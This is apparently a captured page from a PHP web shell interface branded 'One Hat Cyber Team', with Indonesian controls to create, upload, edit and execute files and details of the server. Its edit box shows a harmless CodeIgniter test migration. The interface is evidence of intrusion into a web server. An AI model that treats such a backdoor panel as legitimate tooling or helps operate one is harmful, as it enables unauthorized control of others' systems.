⚝
One Hat Cyber Team
⚝
Your IP:
192.168.31.6
Server IP:
192.168.1.11
Server:
Linux pams 6.1.0-29-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.123-1 (2025-01-02) x86_64
PHP Version:
8.2.28
Buat File
|
Buat Folder
Upload File
Eksekusi
Dir :
~
/
var
/
www
/
pams
/
tests
/
_support
/
Database
/
Migrations
/
Edit File: 2020-02-22-222222_example_migration.php
<?php namespace Tests\Support\Database\Migrations; use CodeIgniter\Database\Migration; class ExampleMigration extends Migration { protected $DBGroup = 'tests'; public function up(): void { $this->forge->addField('id'); $this->forge->addField([ 'name' => ['type' => 'varchar', 'constraint' => 31], 'uid' => ['type' => 'varchar', 'constraint' => 31], 'class' => ['type' => 'varchar', 'constraint' => 63], 'icon' => ['type' => 'varchar', 'constraint' => 31], 'summary' => ['type' => 'varchar', 'constraint' => 255], 'created_at' => ['type' => 'datetime', 'null' => true], 'updated_at' => ['type' => 'datetime', 'null' => true], 'deleted_at' => ['type' => 'datetime', 'null' => true], ]); $this->forge->addKey('name'); $this->forge->addKey('uid'); $this->forge->addKey(['deleted_at', 'id']); $this->forge->addKey('created_at'); $this->forge->createTable('factories'); } public function down(): void { $this->forge->dropTable('factories'); } }
Simpan